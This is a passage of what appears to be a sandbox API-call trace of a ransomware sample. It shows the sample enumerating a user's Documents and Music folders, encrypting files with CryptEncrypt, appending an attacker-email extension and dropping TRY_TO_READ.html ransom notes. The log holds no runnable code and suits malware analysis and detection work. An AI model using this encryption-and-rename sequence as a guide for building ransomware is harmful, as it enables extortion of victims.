halpmcxz\\documents\\vpodwivy35\\ea49e\\kocx94.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0173.154] GetProcessHeap () returned 0x2e0000 [0173.154] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.154] GetFileSizeEx (in: hFile=0x624, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=62413) returned 1 [0173.154] SetFilePointer (in: hFile=0x624, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xf3cd [0173.154] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.154] GetProcessHeap () returned 0x2e0000 [0173.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.154] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.154] WriteFile (in: hFile=0x624, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.155] WriteFile (in: hFile=0x624, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.155] WriteFile (in: hFile=0x624, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.155] ReadFile (in: hFile=0x624, lpBuffer=0x3110048, nNumberOfBytesToRead=0xf3cd, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0xf3cd, lpOverlapped=0x0) returned 1 [0173.158] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.158] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.158] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf", dwFileAttributes=0x80) returned 1 [0173.159] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf") returned 80 [0173.159] GetProcessHeap () returned 0x2e0000 [0173.159] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x106) returned 0x32f868 [0173.159] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf" [0173.159] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf.12781717671972518758.ex_parvis@aol.com.AIR" [0173.159] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\6_qug-kyl_dan8pfoy.pdf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\6_qug-kyl_dan8pfoy.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.162] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\6_qUg-KYl_DAN8PFOy.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\6_qug-kyl_dan8pfoy.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0173.162] GetProcessHeap () returned 0x2e0000 [0173.162] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0173.162] GetFileSizeEx (in: hFile=0x624, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=18705) returned 1 [0173.162] SetFilePointer (in: hFile=0x624, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x4911 [0173.162] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.162] GetProcessHeap () returned 0x2e0000 [0173.162] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.162] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.162] WriteFile (in: hFile=0x624, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.163] WriteFile (in: hFile=0x624, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.163] WriteFile (in: hFile=0x624, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.163] ReadFile (in: hFile=0x624, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x4911, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x4911, lpOverlapped=0x0) returned 1 [0173.165] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\td1paJ\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60335d60, ftCreationTime.dwHighDateTime=0x1d4c77f, ftLastAccessTime.dwLowDateTime=0xb53fd410, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb53fd410, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x384430 [0173.165] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\td1paJ\\dxaBu\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\td1paj\\dxabu\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0173.167] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\td1paJ\\dYpmmXIjWkzAG9b\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\td1paj\\dypmmxijwkzag9b\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0173.169] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\td1paJ\\lemUIFgO0QfBbxa\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\td1paj\\lemuifgo0qfbbxa\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0173.171] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ce26740, ftCreationTime.dwHighDateTime=0x1d4c89c, ftLastAccessTime.dwLowDateTime=0xb53fd410, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb53fd410, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x384470 [0173.171] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.171] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.171] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3", dwFileAttributes=0x80) returned 1 [0173.172] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3") returned 75 [0173.172] GetProcessHeap () returned 0x2e0000 [0173.172] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363b58 [0173.172] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3" [0173.172] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0173.172] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\vtgxztjwld\\pwhvca0pfk.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\vtgxztjwld\\pwhvca0pfk.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.175] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\pwHvca0PFK.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\vtgxztjwld\\pwhvca0pfk.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x62c [0173.175] GetProcessHeap () returned 0x2e0000 [0173.175] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0173.175] GetFileSizeEx (in: hFile=0x62c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=74356) returned 1 [0173.175] SetFilePointer (in: hFile=0x62c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x12274 [0173.175] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.175] GetProcessHeap () returned 0x2e0000 [0173.175] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.175] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.175] WriteFile (in: hFile=0x62c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.176] WriteFile (in: hFile=0x62c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.176] WriteFile (in: hFile=0x62c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.177] ReadFile (in: hFile=0x62c, lpBuffer=0x3110048, nNumberOfBytesToRead=0x12274, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x12274, lpOverlapped=0x0) returned 1 [0173.180] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.180] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.180] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3", dwFileAttributes=0x80) returned 1 [0173.181] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3") returned 73 [0173.181] GetProcessHeap () returned 0x2e0000 [0173.181] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x32f868 [0173.181] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3" [0173.181] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0173.181] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\vtgxztjwld\\4zcla9ch.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\vtgxztjwld\\4zcla9ch.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.183] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\4zcLA9Ch.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\vtgxztjwld\\4zcla9ch.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x62c [0173.183] GetProcessHeap () returned 0x2e0000 [0173.183] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0173.183] GetFileSizeEx (in: hFile=0x62c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=26296) returned 1 [0173.183] SetFilePointer (in: hFile=0x62c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x66b8 [0173.183] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.183] GetProcessHeap () returned 0x2e0000 [0173.183] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.183] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.183] WriteFile (in: hFile=0x62c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.184] WriteFile (in: hFile=0x62c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.184] WriteFile (in: hFile=0x62c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.184] ReadFile (in: hFile=0x62c, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x66b8, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x66b8, lpOverlapped=0x0) returned 1 [0173.185] SetFilePointer (in: hFile=0x62c, lDistanceToMove=-26296, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.185] WriteFile (in: hFile=0x62c, lpBuffer=0x3110048*, nNumberOfBytesToWrite=0x66b8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesWritten=0x2acf9c8*=0x66b8, lpOverlapped=0x0) returned 1 [0173.187] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ca1460, ftCreationTime.dwHighDateTime=0x1d4ca49, ftLastAccessTime.dwLowDateTime=0xb53fd410, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb53fd410, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3844b0 [0173.187] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\7yPcJz9RBVUmy\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\7ypcjz9rbvumy\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0173.189] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.189] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.189] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav", dwFileAttributes=0x80) returned 1 [0173.190] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav") returned 77 [0173.190] GetProcessHeap () returned 0x2e0000 [0173.190] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363b58 [0173.190] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav" [0173.190] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav.12781717671972518758.ex_parvis@aol.com.AIR" [0173.190] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\u us7hlq.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\u us7hlq.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.193] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\u us7HlQ.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\u us7hlq.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0173.193] GetProcessHeap () returned 0x2e0000 [0173.193] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0173.193] GetFileSizeEx (in: hFile=0x630, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=82724) returned 1 [0173.193] SetFilePointer (in: hFile=0x630, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x14324 [0173.193] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.193] GetProcessHeap () returned 0x2e0000 [0173.193] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.193] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.193] WriteFile 